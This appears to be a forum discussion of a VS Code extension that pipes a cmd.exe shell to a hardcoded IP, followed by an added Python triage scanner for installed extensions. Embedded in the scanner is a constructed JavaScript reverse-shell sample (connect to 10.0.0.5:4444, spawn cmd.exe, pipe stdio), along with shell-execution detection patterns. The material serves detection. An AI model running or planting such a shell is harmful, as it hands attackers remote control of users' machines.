True, it’s a private (not local) IP. It could easily have connected to a remote system, as their proof-of-concept did.
This code execs cmd.exe and pipes output to and from a hardcoded IP. That’s pretty weird. What’s running on that IP? How does the extension know something is there?
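A quick way to check for the pattern described above (spawning cmd.exe and wiring its stdio to a socket on a hardcoded address) across the extensions installed on a machine is a static triage scan of each extension's JavaScript. The following is an added example, not code from this thread or from the extension being discussed; the `SAMPLE_EXTENSION_JS` string is a constructed stand-in for an `extension.js` that behaves as described, and `scan_extension_source` and the marker tables are hypothetical names chosen here. It also classifies each hardcoded IPv4 literal as loopback, private or public, which is the distinction raised in the reply above.

```python
import ipaddress
import re

# Constructed sample standing in for a suspicious extension's extension.js.
# It is NOT the real extension's code; it just reproduces the described
# behaviour: connect to a hardcoded IP, spawn cmd.exe, pipe stdio both ways.
SAMPLE_EXTENSION_JS = r"""
const cp = require('child_process');
const net = require('net');
function activate(context) {
  const sock = net.connect(4444, '10.0.0.5');
  const sh = cp.spawn('cmd.exe');
  sock.pipe(sh.stdin);
  sh.stdout.pipe(sock);
}
const docs = 'https://marketplace.visualstudio.com/items';
"""

# Markers for process execution (hypothetical names, chosen for this example).
EXEC_MARKERS = {
    "child_process": r"require\(\s*['\"]child_process['\"]\s*\)",
    "spawn/exec call": r"\b(?:spawn|exec|execFile|execSync)\s*\(",
    "cmd.exe": r"cmd\.exe",
    "powershell": r"powershell(?:\.exe)?",
}
# Markers for raw network I/O and stdio plumbing.
NET_MARKERS = {
    "net.connect": r"\bnet\.connect\s*\(",
    "net.Socket": r"new\s+net\.Socket\b",
    "stream pipe": r"\.pipe\s*\(",
}
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def classify_ip(text):
    """Return 'loopback', 'private', 'public' or 'other' for a valid IPv4 literal, else None."""
    try:
        ip = ipaddress.ip_address(text)
    except ValueError:
        return None  # e.g. 999.1.1.1 or a version string that only looks like an IP
    if ip.is_loopback:
        return "loopback"
    if ip.is_private:
        return "private"
    if ip.is_global:
        return "public"
    return "other"


def scan_extension_source(src):
    """Static triage of one extension's JS: exec markers, net markers, hardcoded IPs."""
    exec_hits = sorted(name for name, pat in EXEC_MARKERS.items() if re.search(pat, src))
    net_hits = sorted(name for name, pat in NET_MARKERS.items() if re.search(pat, src))
    ips = {}
    for m in IPV4_RE.finditer(src):
        kind = classify_ip(m.group(0))
        if kind:
            ips[m.group(0)] = kind
    # Talking to a non-loopback hardcoded host, or opening raw sockets, while
    # also spawning a shell is the combination worth a human look.
    remote_ip = any(kind != "loopback" for kind in ips.values())
    suspicious = bool(exec_hits) and (bool(net_hits) or remote_ip)
    return {
        "exec_hits": exec_hits,
        "net_hits": net_hits,
        "hardcoded_ips": ips,
        "suspicious": suspicious,
    }


if __name__ == "__main__":
    import pathlib
    import sys

    # Usage: python scan.py [~/.vscode/extensions]  (scans *.js under that path),
    # or with no argument, runs against the constructed sample above.
    if len(sys.argv) > 1:
        for path in pathlib.Path(sys.argv[1]).rglob("*.js"):
            report = scan_extension_source(path.read_text(errors="ignore"))
            if report["suspicious"]:
                print(path, report)
    else:
        print(scan_extension_source(SAMPLE_EXTENSION_JS))
```

This is a triage filter, not a verdict: a terminal or debugger extension legitimately spawns shells, so a hit means "read this one", and a miss means nothing if the payload is obfuscated or fetched at runtime.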
It looks like VS Code has no review — human or automated — or enforced entitlement system that would have stopped this or at least had someone verify it was legit.
The one that’s not shown: Standalone Passwords app